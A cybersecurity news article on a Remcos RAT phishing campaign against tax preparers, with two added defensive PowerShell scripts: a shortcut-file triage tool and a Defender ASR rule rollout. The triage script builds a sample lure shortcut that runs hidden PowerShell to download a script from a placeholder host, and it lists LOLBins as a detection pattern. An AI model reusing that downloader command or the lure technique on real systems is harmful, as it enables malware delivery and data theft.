Remcos RAT Targets Tax Pros to Scurry Off With Workers' Filing Info

Something exciting to liven up tax season: cybercriminals accessing sensitive personal information for individuals through the army of accountants preparing for Tax Day in the US.


With the April 18 tax deadline approaching, hackers have been piling onto accountants' stress with a phishing campaign designed to deliver the Remcos remote access Trojan (RAT).

In a blog post published April 13, researchers from Microsoft described a campaign in which attackers are masquerading as clients of CPAs, accounting firms, and related companies handling tax information. The apparent goal is to get these financial custodians — who maintain records containing their clients' most sensitive personal information, like Social Security numbers, addresses, and incomes — to run the Remcos RAT, handing the attacker remote control of the infected Windows machine.

"Those in accounting and finance must be extra vigilant at this time," says Sherrod DeGrippo, director of threat intelligence strategy at Microsoft, who characterized the campaign as medium scale but focused. "It's a hectic time in their business when mistakes may be made."

Remcos is a commercial program from German-based Breaking Security. Short for "Remote Control and Surveillance," it gives an operator full remote control of a Windows computer, including the file system, a command shell, keystroke capture, and screen and webcam capture. Like any program a user is tricked into running, it operates with the privileges of that user's account, so an attacker who lands it on a CPA's laptop gets the same access to client files, email, and applications as the CPA has.

Though Breaking Security has claimed in the past that it sells the tool only for legitimate uses, Remcos and its sister products — including a keylogger, an evasion tool, a spam distribution tool, and more — have been making the rounds in cybercrime circles since the mid-2010s.

Phishing Accountants

The campaign begins with a carefully crafted phishing email, a sample of which Microsoft published with its post.

Notice the subtle social engineering at play: the line "I apologize for not responding sooner" and even the subject line, "Re: 2022," imply an ongoing correspondence with an existing client. The word "confidential" and a password-protected link lend an air of security to the entire affair. The lure is specially designed to be believable in these ways, DeGrippo says, "from its casual tone and lengthy details and instructions."

The link in the email redirects through multiple legitimate services: first an Amazon Web Services click-tracking service, then an ordinary file-hosting site, spaces[.]hightail[.]com. Both act as layers of evasion: the URL a mail filter sees points at a reputable domain, so reputation-based link scanning is less likely to flag it, and the initial archive sits on a well-known hosting service rather than on attacker infrastructure that could be blocklisted.

Sitting on the file-hosting site is a .ZIP file containing shortcut (.LNK) files. When a victim opens one, the shortcut sends a Web request directly to the threat actor's infrastructure, triggering the download of any number of malicious files "such as MSI files containing DLLs or executables, VBScript files containing PowerShell commands, or deceptive PDFs," Microsoft explained. In some cases, the blog noted, the GuLoader downloader was used to fetch the final payload: Remcos RAT.
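The shortcut stage of that chain is where a mail gateway or an analyst can triage the attachment before anyone clicks it. The following PowerShell script is an added example, not code from Microsoft's post or from the campaign. It builds a constructed ZIP holding one benign shortcut and one lure-style shortcut (the "2022 Tax Documents.pdf.lnk" name, its PowerShell command line, and the example.invalid URL are all invented for the example), then expands the archive and reads each .LNK's target and arguments through the WScript.Shell COM object, flagging shortcuts that launch a script host or living-off-the-land binary, reference remote content, or hide a double extension.

```powershell
# Added example (not from Microsoft's post or the campaign): triage a ZIP of
# shortcut files before anyone opens them. The sample ZIP is constructed here;
# the lure shortcut's name, command line and URL are invented and point at nothing.
$ErrorActionPreference = 'Stop'
$work = Join-Path $env:TEMP ('lnk-triage-' + [guid]::NewGuid())
New-Item -ItemType Directory -Path $work | Out-Null

# --- Constructed sample: one benign shortcut, one lure-style shortcut ---
$shell = New-Object -ComObject WScript.Shell
$benign = $shell.CreateShortcut((Join-Path $work 'Notes.lnk'))
$benign.TargetPath = 'C:\Windows\notepad.exe'
$benign.Save()
$lure = $shell.CreateShortcut((Join-Path $work '2022 Tax Documents.pdf.lnk'))   # hypothetical name
$lure.TargetPath = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$lure.Arguments  = '-w hidden -c "iwr http://example.invalid/x.vbs -OutFile $env:TEMP\x.vbs"'  # hypothetical URL
$lure.Save()
$zip = Join-Path $work 'attachment.zip'
Compress-Archive -Path (Join-Path $work '*.lnk') -DestinationPath $zip

function Get-SuspiciousLnk {
    <# Expand a ZIP and report every .lnk it contains, with the reasons it looks like a lure.
       Reading a shortcut through WScript.Shell parses the file; it does not run the target.
       Still, examine real samples only inside an isolated analysis VM. #>
    param([Parameter(Mandatory)][string]$ZipPath)
    $dir = Join-Path $env:TEMP ('lnk-extract-' + [guid]::NewGuid())
    Expand-Archive -Path $ZipPath -DestinationPath $dir
    $sh = New-Object -ComObject WScript.Shell
    # Script hosts and LOLBins commonly used by downloader shortcuts
    $hostPattern = 'powershell|pwsh|cmd\.exe|mshta|wscript|cscript|rundll32|regsvr32|msiexec|certutil|bitsadmin|curl'
    Get-ChildItem -Path $dir -Recurse -Filter '*.lnk' | ForEach-Object {
        $lnk = $sh.CreateShortcut($_.FullName)
        $cmd = ('{0} {1}' -f $lnk.TargetPath, $lnk.Arguments).Trim()
        $reasons = @()
        if ($cmd -match $hostPattern)     { $reasons += 'launches script host or LOLBin' }
        if ($cmd -match 'https?://|\\\\') { $reasons += 'references remote content' }
        if ($_.BaseName -match '\.(pdf|docx?|xlsx?|txt)$') { $reasons += 'double extension' }
        [pscustomobject]@{
            File       = $_.Name
            Command    = $cmd
            Suspicious = ($reasons.Count -gt 0)
            Reasons    = ($reasons -join '; ')
        }
    }
}

Get-SuspiciousLnk -ZipPath $zip | Format-Table -AutoSize
```

On the constructed sample, Notes.lnk comes back with no reasons and the tax-themed shortcut is flagged on all three counts. The same function can be pointed at a quarantined attachment from the mail gateway; because the shortcut is only parsed, not launched, nothing reaches out to the attacker's server during triage.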

Hacking Accountants in April: Savvy Cybercrime Move

That this campaign is happening now — and only began in February — is no coincidence, of course.

"Financial services firms are at their most in-demand time of year," DeGrippo notes. "I just filed my taxes this week and my CPA was clearly working long hours and responding to emails late at night. When that's the case for these kinds of firms, employees might miss something, or click on things they shouldn't."

And when a CPA slips up, it's worse than for just about any other kind of professional.

"These kinds of targets are attractive because they handle financial information of the most sensitive type," DeGrippo continues. "Taxes, Social Security number information, bookkeeping, and bank account and routing numbers are useful to threat actors directly, or they can be sold on the black market to other criminals for use in further attacks."

To help compensate for the lapses in cyber hygiene that can accompany accountants' constant emails, frantic filings, and late hours this time of year, Microsoft recommended that professionals and firms block JavaScript and VBScript from launching downloaded executable content and block untrusted executable files from running (both are available as Microsoft Defender attack surface reduction rules). The blog post also highlighted the utility of antivirus scanning and real-time behavior monitoring.
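What that recommendation looks like in practice, as an added example rather than anything from Microsoft's post: the two controls named above are Microsoft Defender attack surface reduction (ASR) rules with published GUIDs, and a firm that cannot afford a broken tax workflow in April should roll them out in audit mode first, review what would have been blocked, and only then enforce. The script assumes an elevated PowerShell session on a Windows host running Defender; the vendor exclusion path at the end is hypothetical.

```powershell
# Added example (not from Microsoft's post): turn on the two Microsoft Defender
# attack surface reduction rules the post recommends, audit first, then enforce.
# Requires an elevated PowerShell session on Windows 10/11 or Server with Defender.
$rules = @{
    # "Block JavaScript or VBScript from launching downloaded executable content"
    'd3e037e1-3eb8-44c8-a917-57927947596d' = 'JS/VBS launching downloaded executables'
    # "Block executable files from running unless they meet a prevalence, age, or trusted list criterion"
    '01443614-cd74-433a-b99e-2ecdc07bfc25' = 'Untrusted executables (prevalence/age/trust list)'
}
# Numeric action codes that Get-MpPreference reports back
$actionName = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }

function Set-AsrRules {
    param(
        [Parameter(Mandatory)][string[]]$Ids,
        [ValidateSet('AuditMode', 'Enabled', 'Warn', 'Disabled')][string]$Action = 'AuditMode'
    )
    # Add-MpPreference is cumulative: it sets these rules and leaves any others as they are.
    # One action entry per rule ID, in the same order.
    $actions = @($Ids | ForEach-Object { $Action })
    Add-MpPreference -AttackSurfaceReductionRules_Ids $Ids -AttackSurfaceReductionRules_Actions $actions
}

function Get-AsrRuleState {
    # Show every configured ASR rule with its current action, for verification
    $pref = Get-MpPreference
    for ($i = 0; $i -lt $pref.AttackSurfaceReductionRules_Ids.Count; $i++) {
        $id = $pref.AttackSurfaceReductionRules_Ids[$i]
        [pscustomobject]@{
            RuleId = $id
            Action = $actionName[[int]$pref.AttackSurfaceReductionRules_Actions[$i]]
            Name   = $rules[$id]
        }
    }
}

# Stage 1: audit. Would-be blocks are logged as event ID 1122 in
# "Microsoft-Windows-Windows Defender/Operational"; review a week of busy-season traffic.
Set-AsrRules -Ids @($rules.Keys) -Action AuditMode
Get-AsrRuleState | Format-Table -AutoSize

# Stage 2, once the audit log shows no legitimate tax-prep tooling tripping the rules:
# Set-AsrRules -Ids @($rules.Keys) -Action Enabled

# If a specific vendor tool does trip a rule, exclude that path only (hypothetical path):
# Add-MpPreference -AttackSurfaceReductionOnlyExclusions 'C:\Program Files\VendorTaxApp\'
```

Enforced blocks appear as event ID 1121 in the same log, which is the signal a SOC should alert on during filing season: a .LNK-launched script trying to start a downloaded executable on an accountant's workstation is exactly the step this campaign depends on.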

And, DeGrippo adds, "a best practice for sending these kinds of sensitive documents is for firms to have a trusted cloud service where clients can upload their documents.

"Emailing around sensitive material is never a good idea," she concludes. "Especially when there could be malware in the mix."

About the Author(s)

Nate Nelson, Contributing Writer

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.
